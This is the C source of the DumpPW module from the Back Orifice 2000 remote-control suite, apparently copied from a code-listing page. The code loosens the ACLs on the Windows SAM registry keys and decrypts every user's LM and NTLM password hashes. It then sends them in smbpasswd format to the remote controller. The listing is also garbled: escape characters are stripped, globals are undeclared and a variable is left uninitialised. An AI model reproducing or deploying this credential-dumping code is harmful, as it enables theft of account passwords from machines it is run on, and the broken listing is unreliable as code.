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Remote Control
Development Platform:
- /* Back Orifice 2000 - Remote Administration Suite
- Copyright (C) 1999, Cult Of The Dead Cow
- This program is free software; you can redistribute it and/or modify
- it under the terms of the GNU General Public License as published by
- the Free Software Foundation; either version 2 of the License, or
- (at your option) any later version.
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- GNU General Public License for more details.
- You should have received a copy of the GNU General Public License
- along with this program; if not, write to the Free Software
- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
- The author of this program may be contacted at */
- // DumpPW - Thanks to Jeremy Allison for pwdump, it was
- // what this was based on.
- #include <windows.h>
- #include <stdarg.h>
- #include <auth.h>
- #include <iohandler.h>
- #include <encryption.h>
- #include <commandloop.h>
- #include <functions.h>
- DWORD hexstrtoul(char *str)
- {
- DWORD val;
- int i;
- char c1;
- val=0;
- for(i=0;i<8;i++) {
- if(*str=='') break;
- c1=*str++;
- if(c1>='A' && c1<='F') c1=(c1-'A')+0xA;
- else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA;
- else if(c1>='0' && c1<='9') c1=(c1-'0');
- val<<=4;
- val|=c1;
- }
- return val;
- }
- //
- // Utility function to get allocate a SID from a name.
- // Looks on local machine. SID is allocated with malloc
- // and must be freed by the caller.
- // Returns TRUE on success, FALSE on fail.
- //
- static BOOL get_sid(const char *name, SID **ppsid)
- {
- SID_NAME_USE sid_use;
- char *domain;
- DWORD sid_size = 0;
- DWORD dom_size = 0;
- *ppsid = 0;
- if(pLookupAccountName(0, name, 0, &sid_size, 0, &dom_size, &sid_use) == 0) {
- if(GetLastError() != ERROR_INSUFFICIENT_BUFFER) return FALSE;
- }
- *ppsid = (SID *)malloc(sid_size);
- domain = (char *)malloc(dom_size);
- if(*ppsid == 0 || domain == 0) {
- if(*ppsid) free(*ppsid);
- if(domain) free(domain);
- *ppsid = 0;
- return FALSE;
- }
- if(pLookupAccountName(0, name, *ppsid, &sid_size, domain, &dom_size, &sid_use)==0) {
- free(*ppsid);
- free(domain);
- *ppsid = 0;
- return FALSE;
- }
- free(domain);
- return TRUE;
- }
- //
- // Utility function to setup a security descriptor
- // from a varargs list of char *name followed by a DWORD access
- // mask. The access control list is allocated with malloc
- // and must be freed by the caller.
- // returns TRUE on success, FALSE on fail.
- //
- static BOOL __cdecl create_sd_from_list( SECURITY_DESCRIPTOR *sdout, int num, ...)
- {
- va_list ap;
- SID **sids = 0;
- char *name;
- DWORD amask;
- DWORD acl_size;
- PACL pacl = 0;
- int i;
- if((sids=(SID **)malloc(sizeof(SID *)*num))==0) return FALSE;
- acl_size = num * (sizeof(ACL) + sizeof(ACCESS_ALLOWED_ACE) + sizeof(DWORD));
- // Collect all the SID's
- va_start( ap, num);
- for(i=0;i<num;i++) {
- name = va_arg( ap, char *);
- amask = va_arg(ap, DWORD);
- if(get_sid( name, &sids[i]) == FALSE) goto cleanup;
- acl_size += pGetLengthSid(sids[i]);
- }
- va_end(ap);
- if((pacl = (PACL)malloc(acl_size)) == 0) goto cleanup;
- if(pInitializeSecurityDescriptor( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) goto cleanup;
- if(pInitializeAcl( pacl, acl_size, ACL_REVISION) == FALSE) goto cleanup;
- va_start(ap, num);
- for( i = 0; i < num; i++) {
- ACE_HEADER *ace_p;
- name = va_arg( ap, char *);
- amask = va_arg( ap, DWORD);
- if(pAddAccessAllowedAce( pacl, ACL_REVISION, amask, sids[i]) == FALSE) goto cleanup;
- // Make sure the ACE is inheritable
- if(pGetAce( pacl, 0, (LPVOID *)&ace_p) == FALSE) goto cleanup;
- }
- // Add the ACL into the sd
- if(pSetSecurityDescriptorDacl( sdout, TRUE, pacl, FALSE) == FALSE) goto cleanup;
- for( i = 0; i < num; i++) {
- if(sids[i]) free(sids[i]);
- }
- free(sids);
- return TRUE;
- cleanup:
- if(sids) {
- for( i = 0; i < num; i++) {
- if(sids[i]) free(sids[i]);
- }
- free(sids);
- }
- if(pacl) free(pacl);
- return FALSE;
- }
- //
- // Function to go over all the users in the SAM and set an ACL
- // on them.
- //
- static int set_userkeys_security( HKEY start, const char *path, SECURITY_DESCRIPTOR *psd,
- HKEY *return_key)
- {
- HKEY key;
- DWORD err;
- char usersid[128];
- DWORD indx = 0;
- // Open the path and enum all the user keys - setting the same security on them.
- if((err=RegOpenKeyEx(start,path,0,KEY_ENUMERATE_SUB_KEYS,&key))!=ERROR_SUCCESS) return -1;
- // Now enumerate the subkeys, setting the security on them all.
- do {
- DWORD size;
- size=sizeof(usersid);
- err=RegEnumKeyEx(key,indx,usersid,&size,0,0,0,&ft);
- if(err==ERROR_SUCCESS) {
- HKEY subkey;
- indx++;
- if((err=RegOpenKeyEx(key,usersid,0,WRITE_DAC,&subkey))!=ERROR_SUCCESS) {
- RegCloseKey(key);
- return -1;
- }
- if((err=pRegSetKeySecurity(subkey,DACL_SECURITY_INFORMATION,psd))!=ERROR_SUCCESS) {
- RegCloseKey(subkey);
- RegCloseKey(key);
- return -1;
- }
- RegCloseKey(subkey);
- }
- } while(err==ERROR_SUCCESS);
- if(err!=ERROR_NO_MORE_ITEMS) {
- RegCloseKey(key);
- return -1;
- }
- if(return_key==0) RegCloseKey(key);
- else *return_key=key;
- return 0;
- }
- //
- // Function to travel down the SAM security tree in the registry and restore
- // the correct ACL on them. Returns 0 on success. -1 on fail.
- //
- static int restore_sam_tree_access( HKEY start )
- {
- char path[128];
- char AdminGroupName[128];
- char *p;
- int i;
- HKEY key;
- DWORD err;
- DWORD admin_mask;
- admin_mask = WRITE_DAC | READ_CONTROL;
- lstrcpy(AdminGroupName, "Administrators");
- if(!create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL,AdminGroupName, admin_mask)) return -1;
- lstrcpy(path,"SECURITY\SAM\Domains\Account\Users");
- // Remove the security on the user keys first.
- if(set_userkeys_security( start, path, &sd, 0)!=0) return -1;
- // now go up the path, restoring security
- do {
- if((err=RegOpenKeyEx(start,path,0,WRITE_DAC,&key)) != ERROR_SUCCESS) return -1;
- if((err=pRegSetKeySecurity( key, DACL_SECURITY_INFORMATION,&sd)) != ERROR_SUCCESS) {
- RegCloseKey(key);
- return -1;
- }
- RegCloseKey(key);
- p=path+(lstrlen(path)-1);
- for(i=(lstrlen(path)-1);i>=0;i--) {
- if(*p=='\') { *p=0; break; }
- }
- } while(i!=-1);
- return 0;
- }
- //
- // Function to travel the security tree and add Administrators
- // access as WRITE_DAC, READ_CONTROL and READ.
- // Returns 0 on success. -1 on fail if no security was changed,
- // -2 on fail if security was changed.
- //
- static int set_sam_tree_access( HKEY start, HKEY *return_key)
- {
- char path[128];
- char *p;
- char AdminGroupName[128];
- HKEY key;
- DWORD err;
- BOOL security_changed = FALSE;
- DWORD admin_mask;
- BOOL finished = FALSE;
- lstrcpy(AdminGroupName, "Administrators");
- if(!create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL, AdminGroupName, admin_mask)) return -1;
- lstrcpy( path, "SECURITY\SAM\Domains\Account\Users");
- p=path;
- do {
- while(*p!='') {
- if(*p=='\') break;
- p++;
- }
- if(*p=='') finished=TRUE;
- else *p='';
- if((err=RegOpenKeyEx( start, path, 0, WRITE_DAC, &key))!=ERROR_SUCCESS) {
- return(security_changed ? -2: -1);
- }
- if((err=pRegSetKeySecurity( key, DACL_SECURITY_INFORMATION, &sd)) != ERROR_SUCCESS) {
- RegCloseKey(key);
- return(security_changed ? -2: -1);
- }
- security_changed = TRUE;
- RegCloseKey(key);
- if(!finished) {*p='\'; p++;}
- } while( !finished );
- if(set_userkeys_security( start, path, &sd, &key) != 0) return -2;
- if(return_key==0) RegCloseKey(key);
- else *return_key = key;
- return 0;
- }
- //
- // Function to get a little-endian int from an offset into
- // a byte array.
- //
- static int get_int( BYTE *array )
- {
- return((array[0]&0xff) + ((array[1]<<8)&0xff00) +
- ((array[2]<<16)&0xff0000) + ((array[3]<<24)&0xff000000));
- }
- //
- // Function to convert the RID to the first decrypt key.
- //
- static void set_sid_key1(CEncryptionEngine *pCrypt, unsigned long sid)
- {
- unsigned char s[7];
- s[0] = (unsigned char)(sid & 0xFF);
- s[1] = (unsigned char)((sid>>8) & 0xFF);
- s[2] = (unsigned char)((sid>>16) & 0xFF);
- s[3] = (unsigned char)((sid>>24) & 0xFF);
- s[4] = s[0];
- s[5] = s[1];
- s[6] = s[2];
- pCrypt->SetDecryptKey((char *)s);
- }
- //
- // Function to convert the RID to the second decrypt key.
- //
- static void set_sid_key2(CEncryptionEngine *pCrypt, unsigned long sid)
- {
- unsigned char s[7];
- s[0] = (unsigned char)((sid>>24) & 0xFF);
- s[1] = (unsigned char)(sid & 0xFF);
- s[2] = (unsigned char)((sid>>8) & 0xFF);
- s[3] = (unsigned char)((sid>>16) & 0xFF);
- s[4] = s[0];
- s[5] = s[1];
- s[6] = s[2];
- pCrypt->SetDecryptKey((char *)s);
- }
- //
- // Function to split a 'V' entry into a users name, passwords and comment.
- //
- static int __cdecl check_vp(BYTE *vp, int vp_size, char **username, char **fullname,
- char **comment, char **homedir,
- BYTE *lanman,int *got_lanman,
- BYTE *md4, int *got_md4,
- DWORD rid
- )
- {
- int username_offset = get_int(vp + 0xC);
- int username_len = get_int(vp + 0x10);
- int fullname_offset = get_int(vp + 0x18);
- int fullname_len = get_int(vp + 0x1c);
- int comment_offset = get_int(vp + 0x24);
- int comment_len = get_int(vp + 0x28);
- int homedir_offset = get_int(vp + 0x48);
- int homedir_len = get_int(vp + 0x4c);
- int pw_offset = get_int(vp + 0x9c);
- *username = 0;
- *fullname = 0;
- *comment = 0;
- *homedir = 0;
- *got_lanman = 0;
- *got_md4 = 0;
- if(username_len < 0 || username_offset < 0 || comment_len < 0 ||
- fullname_len < 0 || homedir_offset < 0 ||
- comment_offset < 0 || pw_offset < 0)
- return -1;
- username_offset += 0xCC;
- fullname_offset += 0xCC;
- comment_offset += 0xCC;
- homedir_offset += 0xCC;
- pw_offset += 0xCC;
- if((*username = (char *)malloc(username_len + 1)) == 0) {
- return -1;
- }
- if((*fullname = (char *)malloc(fullname_len + 1)) == 0) {
- free(*username);
- *username = 0;
- return -1;
- }
- if((*comment = (char *)malloc(comment_len + 1)) == 0) {
- free(*username);
- *username = 0;
- free(*fullname);
- *fullname = 0;
- return -1;
- }
- if((*homedir = (char *)malloc(homedir_len + 1)) == 0) {
- free(*username);
- *username = 0;
- free(*fullname);
- *fullname = 0;
- free(*comment);
- *comment = 0;
- return -1;
- }
- int nNumChars;
- nNumChars=username_len/sizeof(wchar_t);
- WideCharToMultiByte(CP_ACP,0,(wchar_t *)(vp + username_offset), nNumChars, *username, nNumChars, NULL ,NULL);
- (*username)[nNumChars] = 0;
- nNumChars=fullname_len/sizeof(wchar_t);
- WideCharToMultiByte(CP_ACP,0,(wchar_t *)(vp + fullname_offset), nNumChars, *fullname, nNumChars, NULL ,NULL);
- (*fullname)[nNumChars] = 0;
- nNumChars=comment_len/sizeof(wchar_t);
- WideCharToMultiByte(CP_ACP,0,(wchar_t *)(vp + comment_offset), nNumChars, *comment, nNumChars, NULL ,NULL);
- (*comment)[nNumChars] = 0;
- nNumChars=homedir_len/sizeof(wchar_t);
- WideCharToMultiByte(CP_ACP,0,(wchar_t *)(vp + homedir_offset), nNumChars, *homedir, nNumChars, NULL ,NULL);
- (*homedir)[nNumChars] = 0;
- if(pw_offset >= vp_size) {
- // No password
- *got_lanman = 0;
- *got_md4 = 0;
- return 0;
- }
- // Check that the password offset plus the size of the
- // lanman and md4 hashes fits within the V record.
- if(pw_offset + 32 > vp_size) {
- // Account disabled
- *got_lanman = -1;
- *got_md4 = -1;
- return 0;
- }
- // Get DES Engine
- ENCRYPTION_ENGINE *eng=g_pEncryptionHandler->GetEngineByID("DES");
- if(eng==NULL) {
- *got_lanman = -1;
- *got_md4 = -1;
- return 0;
- }
- CEncryptionEngine crypt(eng);
- crypt.Startup();
- // Get the two decrypt keys.
- BYTE *pBlock;
- int nBlockLen;
- vp += pw_offset;
- // Set 'first half key'
- set_sid_key1(&crypt,rid);
- // First half of lanman hash
- pBlock=crypt.Decrypt(vp,8,&nBlockLen);
- memcpy(lanman,pBlock,8);
- crypt.Free(pBlock);
- // First half of ntlm hash
- pBlock=crypt.Decrypt(vp+16,8,&nBlockLen);
- memcpy(md4,pBlock,8);
- crypt.Free(pBlock);
- // Set 'second half key'
- set_sid_key2(&crypt,rid);
- // Second half of lanman hash
- pBlock=crypt.Decrypt(vp+8,8,&nBlockLen);
- memcpy(&lanman[8],pBlock,8);
- crypt.Free(pBlock);
- // First half of ntlm hash
- pBlock=crypt.Decrypt(vp+24,8,&nBlockLen);
- memcpy(&md4[8],pBlock,8);
- crypt.Free(pBlock);
- crypt.Shutdown();
- *got_lanman = 1;
- *got_md4 = 1;
- return 0;
- }
- //
- // Function to strip out any ':' or 'n', 'r' from a text
- // string.
- //
- static void strip_text( char *p )
- {
- while(*p!='') {
- if(*p == ':') *p='_';
- else if(*p == 'n') *p='_';
- else if(*p == 'r') *p='_';
- p++;
- }
- }
- //
- // Function to dump a users smbpasswd entry onto stdout.
- // Returns 0 on success, -1 on fail.
- //
- static int __cdecl printout_smb_entry(CAuthSocket *cas_from, int comid, HKEY user, DWORD rid )
- {
- DWORD err;
- DWORD type;
- DWORD size = 0;
- BYTE *vp;
- BYTE lanman[16];
- BYTE md4_hash[16];
- char *username;
- char *fullname;
- char *comment;
- char *homedir;
- int got_lanman;
- int got_md4;
- // Find out how much space we need for the 'V' value.
- if((err=RegQueryValueEx( user, "V", 0, &type, 0, &size)) != ERROR_SUCCESS) return -1;
- if((vp=(BYTE *)malloc(size)) == 0) return -1;
- if((err=RegQueryValueEx( user, "V", 0, &type, (LPBYTE)vp, &size))!=ERROR_SUCCESS) {
- free(vp);
- return -1;
- }
- // Check heuristics
- if(check_vp(vp, size, &username, &fullname, &comment, &homedir, lanman, &got_lanman, md4_hash, &got_md4, rid) != 0) {
- free(vp);
- return 0;
- }
- // Ensure username of comment don't have any nasty suprises
- // for us such as an embedded ':' or 'n' - see multiple UNIX
- // passwd field update security bugs for details...
- strip_text( username );
- strip_text( fullname );
- strip_text( comment );
- // If homedir contains a drive letter this mangles it - but it protects
- // the integrity of the smbpasswd file.
- strip_text( homedir );
- char svLanmanText[33];
- if(got_lanman>0) {
- wsprintf(svLanmanText,"%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X",
- lanman[0],lanman[1],lanman[2],lanman[3],lanman[4],lanman[5],lanman[6],lanman[7],
- lanman[8],lanman[9],lanman[10],lanman[11],lanman[12],lanman[13],lanman[14],lanman[15]);
- } else {
- if(got_lanman==-1) lstrcpy(svLanmanText,"DISABLED");
- else lstrcpy(svLanmanText,"NO PASSWORD");
- }
- char svNTLMText[33];
- if(got_md4>0) {
- wsprintf(svNTLMText,"%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X%2X",
- md4_hash[0],md4_hash[1],md4_hash[2],md4_hash[3],md4_hash[4],md4_hash[5],md4_hash[6],md4_hash[7],
- md4_hash[8],md4_hash[9],md4_hash[10],md4_hash[11],md4_hash[12],md4_hash[13],md4_hash[14],md4_hash[15]);
- } else {
- if(got_md4==-1) lstrcpy(svNTLMText,"DISABLED");
- else lstrcpy(svNTLMText,"NO PASSWORD");
- }
- char *pBuffer;
- int nBufLen;
- nBufLen=64+lstrlen(username)+lstrlen(svLanmanText)+lstrlen(svNTLMText)+lstrlen(fullname)+lstrlen(comment)+lstrlen(homedir);
- pBuffer=(char *)malloc(nBufLen);
- if(pBuffer==NULL) {
- free(username);
- free(fullname);
- free(comment);
- free(homedir);
- free(vp);
- return -1;
- }
- wsprintf(pBuffer,"%s:%d:%s:%s:%s,%s:%sn",
- username,
- rid,
- svLanmanText,
- svNTLMText,
- fullname,
- comment,
- homedir);
- IssueAuthCommandReply(cas_from,comid,1,pBuffer);
- free(pBuffer);
- free(username);
- free(fullname);
- free(comment);
- free(homedir);
- free(vp);
- return 0;
- }
- //
- // Function to go through all the user SID's - dumping out
- // their SAM values. Returns 0 on success, -1 on fail.
- //
- static int enumerate_users(CAuthSocket *cas_from, int comid, HKEY key)
- {
- DWORD indx = 0;
- DWORD err;
- DWORD rid;
- char usersid[128];
- do {
- DWORD size;
- size = sizeof(usersid);
- err = RegEnumKeyEx( key, indx, usersid, &size, 0, 0, 0, &ft);
- if(err == ERROR_SUCCESS) {
- HKEY subkey;
- indx++;
- if((err=RegOpenKeyEx( key, usersid, 0, KEY_QUERY_VALUE, &subkey))!=ERROR_SUCCESS) {
- RegCloseKey(key);
- return -1;
- }
- rid = hexstrtoul(usersid);
- // Hack as we know there is a Names key here
- if(rid != 0) {
- if(printout_smb_entry(cas_from, comid, subkey, rid ) != 0) {
- RegCloseKey(subkey);
- return -1;
- }
- }
- RegCloseKey(subkey);
- }
- } while(err == ERROR_SUCCESS);
- if(err != ERROR_NO_MORE_ITEMS) {
- RegCloseKey(key);
- return -1;
- }
- return 0;
- }
- int DumpPasswordHashes(CAuthSocket *cas_from, int comid)
- {
- HKEY users_key;
- int err;
- //
- // We need to get to HKEY_LOCAL_MACHINESECURITYSAMDomainsAccountUsers.
- // The security on this key normally doesn't allow Administrators
- // to read - we need to add this.
- //
- if((err=set_sam_tree_access(start_key,&users_key))!=0) {
- if(err==-2) restore_sam_tree_access(start_key);
- return -1;
- }
- // Print the users SAM entries in smbpasswd format onto stdout.
- enumerate_users(cas_from, comid, users_key);
- RegCloseKey(users_key);
- IssueAuthCommandReply(cas_from, comid, 0, "Finished collecting user hashes.n");
- // reset the security on the SAM
- restore_sam_tree_access(start_key);
- if(start_key!=HKEY_LOCAL_MACHINE) RegCloseKey(start_key);
- IssueAuthCommandReply(cas_from, comid, 0, NULL);
- return 0;
- }